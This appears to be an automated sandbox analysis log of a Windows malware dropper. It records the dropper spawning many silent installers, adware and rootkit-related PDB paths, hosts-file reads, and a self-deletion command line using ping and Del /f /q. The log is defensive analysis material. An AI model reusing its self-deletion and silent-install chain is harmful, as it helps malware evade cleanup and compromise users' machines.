            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Virustotal: Detection: 31%
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | ReversingLabs: Detection: 27%
            Source: tpwlxkeo40z.exe | String found in binary or memory: hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_bl
            Source: installer.exe | String found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe'
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe'
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe'
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparams
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe'
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23
            Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: unknown | Process created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparams
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe'
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Process created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe | Process created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe'
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe | Process created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | File opened: C:\Windows\SysWOW64\RICHED32.DLL
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe.config
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\uninstaller.exe
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe | Directory created: C:\Program Files\89C8W4UQTF\uninstaller.exe.config
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe | Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393}
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdbw) source: tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdb source: tpwlxkeo40z.exe
            Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdb source: 2mqvpn30gyk.exe
            Source: Binary string: symsrv.pdb source: app.exe, 00000013.00000002.852052823.0000000000B9F000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: multitimer.exe, 00000002.00000002.669955444.000000001B530000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.683380716.00000000127CB000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdbcE source: 2mqvpn30gyk.exe, 0000000E.00000002.764745587.000000000266E000.00000004.00000001.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: mscorrc.pdb source: multitimer.exe, 00000002.00000002.668297568.0000000000CC0000.00000002.00000001.sdmp, multitimer.exe, 00000003.00000002.681530464.0000000000990000.00000002.00000001.sdmp, multitimer.exe, 00000008.00000002.723019042.0000000003110000.00000002.00000001.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: multitimer.exe, 00000002.00000002.669955444.000000001B530000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.683380716.00000000127CB000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\EuBuild\obj\Debug\EuBuild.pdb source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: app.exe, 00000013.00000002.852052823.0000000000B9F000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdb#7 source: 2mqvpn30gyk.exe, 0000000E.00000002.740880867.0000000000262000.00000002.00020000.sdmp
